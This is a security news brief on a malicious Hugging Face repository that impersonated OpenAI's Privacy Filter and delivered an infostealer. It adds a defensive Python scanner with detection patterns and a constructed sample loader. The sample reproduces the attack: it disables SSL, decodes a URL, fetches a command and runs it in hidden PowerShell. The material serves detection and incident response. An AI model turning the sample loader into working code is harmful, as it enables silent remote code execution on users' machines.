What happened
A malicious Hugging Face repository impersonating OpenAI’s Privacy Filter project reached the platform’s trending list and accumulated 244,000 downloads before being removed following reports from HiddenLayer researchers. The repository, named Open-OSS/privacy-filter, briefly reached the number one spot on Hugging Face’s trending page. The download count and the 667 accounts that liked the repository are assessed as likely artificially inflated through automation.
The repository copied OpenAI’s legitimate Privacy Filter model card nearly verbatim and included a loader.py file that appeared to contain legitimate AI-related code. In the background, the script disabled SSL verification, decoded a base64-encoded URL pointing to an external resource, and fetched and executed a JSON payload containing a PowerShell command in an invisible window. That command downloaded a batch file named start.bat that performed privilege escalation, downloaded the final payload called sefirah, added it to Microsoft Defender’s exclusions, and executed it.
The final payload is a Rust-based infostealer targeting browser data from Chromium and Gecko-based browsers including cookies, saved passwords, encryption keys, session tokens, and browsing data; Discord tokens and local databases; cryptocurrency wallets and browser extensions; SSH, FTP, and VPN credentials and configuration files; sensitive local files and wallet seeds; system information; and multi-monitor screenshots. All stolen data is compressed and exfiltrated to a C2 server at recargapopular[.]com. The malware includes extensive anti-analysis capabilities including checks for virtual machines, sandboxes, debuggers, and analysis tools. HiddenLayer also identified overlapping infrastructure with other malicious repositories and connections to an npm typosquatting campaign distributing the WinOS 4.0 implant.
Who is affected
AI and machine learning developers, researchers, and data scientists who downloaded files from the Open-OSS/privacy-filter repository on or before May 7, 2026 are directly at risk. Given the breadth of data targeted including browser sessions, cryptocurrency wallets, VPN configurations, and SSH keys, any environment where the loader.py script was executed should be treated as fully compromised.
Why CISOs should care
A malicious repository reaching the number one trending position on Hugging Face with 244,000 downloads illustrates how effectively threat actors can exploit trust signals on AI development platforms. Developers who apply healthy skepticism to unknown npm packages or PyPI libraries may apply less scrutiny to a top-trending Hugging Face repository impersonating a recognized AI organization. The combination of a convincing model card, legitimate-looking code, and trending status creates a social proof mechanism that bypasses typical red flags.
The connection to the WinOS 4.0 implant campaign and the shared malicious loader infrastructure indicates this is not an isolated incident but part of a broader campaign targeting the AI development ecosystem specifically.
3 practical actions
- Reimage machines and rotate all credentials immediately if the malicious repository was downloaded: HiddenLayer’s specific guidance is to reimage affected machines, rotate all stored credentials, replace cryptocurrency wallets and seed phrases, and invalidate all browser sessions and tokens. The Rust-based infostealer’s scope makes partial remediation inadequate.
- Block recargapopular[.]com at the network perimeter and hunt for existing connections in logs: The C2 domain is the confirmed exfiltration endpoint. Add it to DNS blocklists immediately and review network logs for any outbound connections to this domain from developer workstations and build environments.
- Implement Hugging Face repository vetting policies for AI development teams: Establish organizational guidelines requiring verification of repository publisher identity, review of model cards against official sources, and security review of any Python scripts before execution, particularly those that make external network calls or disable SSL verification, regardless of a repository’s apparent popularity or trending status.
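As an added illustration of the vetting step above (not code from HiddenLayer or this article), a small pre-execution screening script that flags the loader behaviours described earlier: disabled SSL verification, base64-decoded URLs, hidden PowerShell launches, Defender exclusions, and the reported C2 domain. The regex signatures and the sample loader are constructed assumptions about how such code typically looks, not the actual contents of the malicious loader.py.

```python
import base64
import re
from typing import Dict, List, Tuple

# Generic signatures for the behaviours attributed to loader.py. They are
# assumptions about how such code usually looks in Python source, not the
# real file's contents; treat hits as triage leads for manual review.
RULES: List[Tuple[str, re.Pattern]] = [
    ("ssl_verification_disabled",
     re.compile(r"verify\s*=\s*False|_create_unverified_context|CERT_NONE")),
    ("base64_decode_call", re.compile(r"\bb64decode\s*\(")),
    ("hidden_powershell",
     re.compile(r"powershell.*?-(?:WindowStyle|w)\W*Hidden", re.IGNORECASE)),
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\W*-Exclusion", re.IGNORECASE)),
    ("known_c2_domain", re.compile(r"recargapopular\.com", re.IGNORECASE)),
]
# Long base64-looking string literals are decoded to see what they hide.
B64_LITERAL = re.compile(r"[\"']([A-Za-z0-9+/]{16,}={0,2})[\"']")

def scan_source(source: str) -> Dict[str, List[Tuple[int, str]]]:
    """Return {rule_name: [(line_no, evidence), ...]} for every match."""
    hits: Dict[str, List[Tuple[int, str]]] = {}
    for line_no, line in enumerate(source.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.setdefault(name, []).append((line_no, line.strip()))
        for literal in B64_LITERAL.findall(line):
            try:
                text = base64.b64decode(literal, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue  # not valid base64, or not text: ignore
            if text.startswith(("http://", "https://")):
                hits.setdefault("base64_hidden_url", []).append((line_no, text))
    return hits

def review_required(hits: Dict[str, List[Tuple[int, str]]]) -> bool:
    """Block execution if the C2 domain appears or two behaviours co-occur."""
    return "known_c2_domain" in hits or len(hits) >= 2

# Constructed sample reproducing the described chain; example.invalid is a
# reserved, non-routable name, so nothing is actually contacted.
SAMPLE_URL_B64 = base64.b64encode(b"https://example.invalid/payload.json").decode()
SAMPLE_LOADER = f'''import base64, ssl, subprocess, requests
ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("{SAMPLE_URL_B64}").decode()
cfg = requests.get(url, verify=False).json()
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command", cfg["cmd"]])
'''
```

Run `scan_source` over every .py file pulled from a repository before anything is executed; a single `verify=False` in isolation is only a lead, whereas the combination of behaviours is what warrants blocking.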
Also in the news today:
- ShinyHunters Defaces Canvas Login Portals at 330 Schools in Escalating Extortion Campaign
- JDownloader Website Hacked to Replace Installers With Python RAT Malware
- German Police Shut Down Crimenetwork Reboot, Arrest Administrator in Spain
- Attackers Abuse Google Ads and Claude.ai Shared Chats to Push Mac Malware
- GM to Pay $12.75 Million in California Privacy Settlement Over Driver Data Sales
- Škoda Online Shop Security Incident Exposes Customer Data
